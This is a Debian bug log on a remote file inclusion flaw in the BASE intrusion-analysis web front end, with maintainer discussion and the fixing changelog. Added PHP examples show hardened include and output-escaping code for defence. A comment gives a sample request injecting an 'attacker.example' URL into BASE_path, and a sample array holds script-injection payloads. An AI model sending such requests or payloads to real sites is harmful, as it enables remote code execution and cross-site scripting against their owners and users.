Report forwarded to debian-bugs-dist@lists.debian.org, Debian Security Team <team@security.debian.org>: Bug#370576; Package acidbase.
Acknowledgement sent to David Gil <dgil@telefonica.net>:
New Bug report received and forwarded. Copy sent to Debian Security Team <team@security.debian.org>.
Package: acidbase
Severity: grave
Tags: security
Justification: user security hole
http://www.frsirt.com/english/advisories/2006/1996
Advisory ID : FrSIRT/ADV-2006-1996
CVE ID : GENERIC-MAP-NOMATCH
Rated as : High Risk
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-05-26
Technical Description
Multiple vulnerabilities have been identified in Basic Analysis and Security
Engine (BASE), which could be exploited by attackers to execute arbitrary
commands. These flaws are due to input validation errors in the
"base_qry_common.php", "base_stat_common.php", and
"includes/base_include.inc.php" scripts that do not validate the "BASE_path"
parameter, which could be exploited by remote attackers to include malicious
scripts and execute arbitrary commands with the privileges of the web server.
Affected Products
Basic Analysis and Security Engine (BASE) 1.2.4 and prior
-- System Information:
Debian Release: testing/unstable
APT prefers unstable
APT policy: (500, 'unstable'), (500, 'testing'), (1, 'experimental')
Architecture: i386 (i686)
Shell: /bin/sh linked to /bin/bash
Kernel: Linux 2.6.16-2-686
Locale: LANG=es_ES@euro, LC_CTYPE=es_ES@euro (charmap=ISO-8859-15)
Information forwarded to debian-bugs-dist@lists.debian.org: Bug#370576; Package acidbase.
Acknowledgement sent to David Gil <dgil@telefonica.net>:
Extra info received and forwarded to list.
tags 370576 + fixed-upstream pending
thanks
Fixed in upstream BASE 1.2.5 (sarah). Expect a new package in a few
days.
Tags added: fixed-upstream, pending
Request was from David Gil <dgil@telefonica.net>
to control@bugs.debian.org.
Information forwarded to debian-bugs-dist@lists.debian.org, David Gil <dgil@telefonica.net>: Bug#370576; Package acidbase.
Acknowledgement sent to Kevin Johnson <kjohnson@secureideas.net>:
Extra info received and forwarded to list. Copy sent to David Gil <dgil@telefonica.net>.
I have to disagree with the Severity of grave. To exploit you need
to have register_globals set to on which has not been the default in
years. We have released 1.2.5 which fixes the issue and a number of
other things. It just gets under my skin when "researchers" find
problems, elevate how serious they are and never notify the
development team.
Sorry for my rant,
Kevin
---------------------
BASE Project Lead
http://sourceforge.net/projects/secureideas
http://base.secureideas.net
The next step in IDS analysis!
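The advisory in the original report and Kevin's point about register_globals describe the same mechanism: a script that expects a caller-supplied $BASE_path variable and, with register_globals=On, receives it from the query string instead. The following is an added illustrative example, not code from BASE, the advisory, or either poster; the file name lib.php, the variable $BASE_path and the APP_ROOT constant are assumed for illustration and BASE's real include logic is not reproduced. It shows the register_globals-dependent include pattern next to a hardened form that takes its prefix from a constant, refuses to run under register_globals, and confines the resolved path to the application directory.

```php
<?php
// Added illustrative example, not code from BASE or from the advisory. The
// file name (lib.php), the variable $BASE_path and the APP_ROOT constant are
// assumed for illustration; BASE's real include logic is not reproduced here.

// --- The register_globals-dependent pattern -------------------------------
// The included library expects the caller to have set $BASE_path first, and
// never validates it. With register_globals=On, PHP seeds $BASE_path from the
// request, so ...?BASE_path=http://attacker.example/ makes include() below
// load and execute remote code (if the engine permits URL includes) with the
// web server's privileges. With register_globals=Off the same request leaves
// $BASE_path unset, which is why the default configuration is not exploitable.
function vulnerable_include()
{
    global $BASE_path;               // intended to be set by the calling script
    include $BASE_path . '/lib.php'; // prefix under request control when register_globals=On
}

// --- A hardened form ------------------------------------------------------
// 1. The include prefix comes from a constant, never from a variable that the
//    request could have populated.
// 2. The script refuses to run when register_globals is on, so a forgotten
//    initialisation can never be filled in by the request.
// 3. The resolved path must stay under the application directory.
define('APP_ROOT', dirname(__FILE__)); // assumption: application root is this file's directory

function guarded_include($relative)
{
    if (ini_get('register_globals')) {
        // register_globals was removed in PHP 5.4; on older engines refuse to run.
        header('HTTP/1.0 500 Internal Server Error');
        exit('refusing to run with register_globals enabled');
    }
    // Reject traversal and any scheme (http://, php://, data:) up front.
    if (strpos($relative, '..') !== false || strpos($relative, ':') !== false) {
        header('HTTP/1.0 400 Bad Request');
        exit('invalid include path');
    }
    // realpath() returns false for URLs and missing files; the prefix check
    // catches symlinks that resolve outside the application directory.
    $full = realpath(APP_ROOT . '/' . $relative);
    if ($full === false || strpos($full, APP_ROOT . DIRECTORY_SEPARATOR) !== 0) {
        header('HTTP/1.0 400 Bad Request');
        exit('include path escapes application directory');
    }
    require $full;
}

// Usage: guarded_include('includes/lib.php');
```

The register_globals check matters even when the application itself never reads $BASE_path from the request: any variable a script forgets to initialise becomes request-controlled under that setting, so the safe response is to refuse to run rather than to audit every variable.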
On Jun 5, 2006, at 6:24 PM, David Gil wrote:
> Package: acidbase
> Severity: grave
> Tags: security
> Justification: user security hole
>
> http://www.frsirt.com/english/advisories/2006/1996
>
> Advisory ID : FrSIRT/ADV-2006-1996
> CVE ID : GENERIC-MAP-NOMATCH
> Rated as : High Risk
> Remotely Exploitable : Yes
> Locally Exploitable : Yes
> Release Date : 2006-05-26
>
> Technical Description
>
> Multiple vulnerabilities have been identified in Basic Analysis
> and Security
> Engine (BASE), which could be exploited by attackers to execute
> arbitrary
> commands. These flaws are due to input validation errors in the
> "base_qry_common.php", "base_stat_common.php", and
> "includes/base_include.inc.php" scripts that do not validate the
> "BASE_path"
> parameter, which could be exploited by remote attackers to include
> malicious
> scripts and execute arbitrary commands with the privileges of the
> web server.
>
> Affected Products
>
> Basic Analysis and Security Engine (BASE) 1.2.4 and prior
>
> -- System Information:
> Debian Release: testing/unstable
> APT prefers unstable
> APT policy: (500, 'unstable'), (500, 'testing'), (1, 'experimental')
> Architecture: i386 (i686)
> Shell: /bin/sh linked to /bin/bash
> Kernel: Linux 2.6.16-2-686
> Locale: LANG=es_ES@euro, LC_CTYPE=es_ES@euro (charmap=ISO-8859-15)
>
>
Information forwarded to debian-bugs-dist@lists.debian.org, David Gil <dgil@telefonica.net>: Bug#370576; Package acidbase.
Acknowledgement sent to Kevin Johnson <kjohnson@secureideas.net>:
Extra info received and forwarded to list. Copy sent to David Gil <dgil@telefonica.net>.
Information forwarded to debian-bugs-dist@lists.debian.org: Bug#370576; Package acidbase.
Acknowledgement sent to David Gil <dgil@telefonica.net>:
Extra info received and forwarded to list.
severity 370576 minor
thanks
On Tue, 06-06-2006 at 13:01 -0400, Kevin Johnson wrote:
> I have to disagree with the Severity of grave. To exploit you need
> to have register_globals set to on which has not been the default in
> years.
Ok, now the bug has a minor severity. You are right, base is not
exploitable with the default installation of the package.
> We have released 1.2.5 which fixes the issue and a number of
> other things.
Yes, I am aware of it. We'll upload it in a few days. I've submitted the
bug report to inform the security team (testing distribution has also
base 1.2.4) and to explain the changes in the 1.2.5 changelog in more
depth.
> It just gets under my skin when "researchers" find
> problems, elevate how serious they are and never notify the
> development team.
Well, I don't understand you Kevin. I know you are subscribed to the
package tracking system of acidbase, so I know that you receive all the
bugs submitted to the package too. If you don't agree with the severity
of a bug, you can always change it as I've just done.
> Sorry for my rant,
> Kevin
Regards,
David.
Information forwarded to debian-bugs-dist@lists.debian.org, David Gil <dgil@telefonica.net>: Bug#370576; Package acidbase.
Acknowledgement sent to Kevin Johnson <kjohnson@secureideas.net>:
Extra info received and forwarded to list. Copy sent to David Gil <dgil@telefonica.net>.
On Jun 7, 2006, at 5:08 AM, David Gil wrote:
> severity 370576 minor
> thanks
>
Thanks...
> On Tue, 06-06-2006 at 13:01 -0400, Kevin Johnson wrote:
>> I have to disagree with the Severity of grave. To exploit you need
>> to have register_globals set to on which has not been the default in
>> years.
>
> Ok, now the bug has a minor severity. You are right, base is not
> exploitable with the default installation of the package.
>
>> We have released 1.2.5 which fixes the issue and a number of
>> other things.
>
> Yes, I am aware of it. We'll upload it in a few days. I've
> submitted the
> bug report to inform the security team (testing distribution has also
> base 1.2.4) and to explain the changes in the 1.2.5 changelog in more
> depth.
>
Great... I appreciate it...
>> It just gets under my skin when "researchers" find
>> problems, elevate how serious they are and never notify the
>> development team.
>
> Well, I don't understand you Kevin. I know you are subscribed to the
> package tracking system of acidbase, so I know that you receive all
> the
> bugs submitted to the package too. If you don't agree with the severity
> of a bug, you can always change it as I've just done.
>
Sorry this was not meant toward you. I was speaking of St0ke and
Milw0rm. I apologize for venting at you and the bug tracking
system. As to changing the severity, I forgot. We have been busy
around here since my new daughter arrived Monday.
>> Sorry for my rant,
>> Kevin
>
> Regards,
> David.
>
>
Thanks
Kevin
---------------------
BASE Project Lead
http://sourceforge.net/projects/secureideas
http://base.secureideas.net
The next step in IDS analysis!
Severity set to `minor' from `grave'
Request was from David Gil <dgil@telefonica.net>
to control@bugs.debian.org.
Reply sent to David Gil <dgil@telefonica.net>:
You have taken responsibility.
Notification sent to David Gil <dgil@telefonica.net>:
Bug acknowledged by developer.
Source: acidbase
Source-Version: 1.2.5-1
We believe that the bug you reported is fixed in the latest version of
acidbase, which is due to be installed in the Debian FTP archive:
acidbase_1.2.5-1.diff.gz
to pool/main/a/acidbase/acidbase_1.2.5-1.diff.gz
acidbase_1.2.5-1.dsc
to pool/main/a/acidbase/acidbase_1.2.5-1.dsc
acidbase_1.2.5-1_all.deb
to pool/main/a/acidbase/acidbase_1.2.5-1_all.deb
acidbase_1.2.5.orig.tar.gz
to pool/main/a/acidbase/acidbase_1.2.5.orig.tar.gz
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 370576@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
David Gil <dgil@telefonica.net> (supplier of updated acidbase package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.7
Date: Mon, 12 Jun 2006 21:20:37 +0200
Source: acidbase
Binary: acidbase
Architecture: source all
Version: 1.2.5-1
Distribution: unstable
Urgency: high
Maintainer: David Gil <dgil@telefonica.net>
Changed-By: David Gil <dgil@telefonica.net>
Description:
acidbase - Basic Analysis and Security Engine
Closes: 363548 370576
Changes:
acidbase (1.2.5-1) unstable; urgency=high
.
* New upstream release, which includes the following security improvements:
+ Added XSSPrintSafe() (array-safe htmlspecialchars() function) and made
filterSql() use ADOdb qmagic()
+ Filtered all unfiltered (mainly auth system stuff) $_POST and $_GET
variables using filterSql()
+ Sanitized all $_SERVER variables to be protected against XSS attacks
These improvements fix the following security bugs:
+ Cross-site scripting (XSS) vulnerability (CVE-2006-1590)
(Closes: #363548).
+ Remote File Inclusion Vulnerabilities (CVE-2006-2685)
(Closes: #370576).
.
* debian/patches/02_update_external_links.dpatch : updated.
.
* Applied part of the patch from Paul Wise <pabs3@bonedaddy.net>:
+ Remove short description from long description
+ Update copyright file with more information
.
* Bump Standards-Version to 3.7.2 (no policy-related changes needed).
.
* Fix an annoying dbconfig-common error: Add dbc_dbtypes variable in
maintainer scripts, not only in the config file.
This is related to bug #372948 (dbconfig-common: can not determine the
database type).
.
* Remove ucf file under /etc/acidbase on package purge.
Files:
1627500fb735f4ce19a137031d59c0c3 683 web optional acidbase_1.2.5-1.dsc
cd6a83df67106ebf9a148d5ac1ec9b8c 335819 web optional acidbase_1.2.5.orig.tar.gz
3cc7ab0405eaf4e2539f64a175af64f6 14891 web optional acidbase_1.2.5-1.diff.gz
15ce906b026e9bb7d89a4c9dd600e28d 346322 web optional acidbase_1.2.5-1_all.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)
iD8DBQFEjvmKsandgtyBSwkRAhSVAJ46v7d4R2rcEEMNf+YoI26PdkVpDACfdtKL
d9OHPfMIsMKT1oNU4OeTlf4=
=YUKe
-----END PGP SIGNATURE-----
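The changelog above names an array-safe htmlspecialchars() wrapper, XSSPrintSafe(), applied to $_SERVER, $_GET and $_POST data before output. The following is an added illustrative example of that kind of wrapper; it is not BASE's own XSSPrintSafe() and does not reproduce its code. The function name xss_print_safe_example and the sample input array are assumptions constructed for illustration, not real request data.

```php
<?php
// Added illustrative example, not BASE's own XSSPrintSafe(): a recursive,
// array-safe wrapper around htmlspecialchars() that escapes a scalar, or every
// key and leaf of a nested array, for safe HTML output. Running $_SERVER-derived
// values such as PHP_SELF and QUERY_STRING through it before echoing them is
// what blocks the reflected-XSS class the changelog refers to.
function xss_print_safe_example($value)
{
    if (is_array($value)) {
        $out = array();
        foreach ($value as $k => $v) {
            // Keys are escaped too: for $_GET/$_POST they originate from the request.
            $out[xss_print_safe_example($k)] = xss_print_safe_example($v);
        }
        return $out;
    }
    // ENT_QUOTES escapes both quote styles, so the result is safe inside
    // attribute values as well as element content. Without it a value placed
    // in href="..." can still break out with a double quote.
    return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
}

// Constructed sample input standing in for server/request data (not real traffic).
$sample = array(
    'PHP_SELF'     => '/index.php/"><script>alert(1)</script>',
    'QUERY_STRING' => 'sort_order=time_d&x=<img src=x onerror=alert(1)>',
    'nested'       => array("O'Reilly & <b>Sons</b>" => 'value'),
);
$safe = xss_print_safe_example($sample);

// The escaped copy can be interpolated into both attribute and element context.
echo '<a href="' . $safe['PHP_SELF'] . '">' . $safe['QUERY_STRING'] . "</a>\n";
```

Escaping at output time, as here, is the reliable control; filtering the request arrays on entry (as the changelog also describes) is defence in depth, since a value that is safe for SQL is not automatically safe for HTML.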
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Tue, 26 Jun 2007 14:50:10 GMT)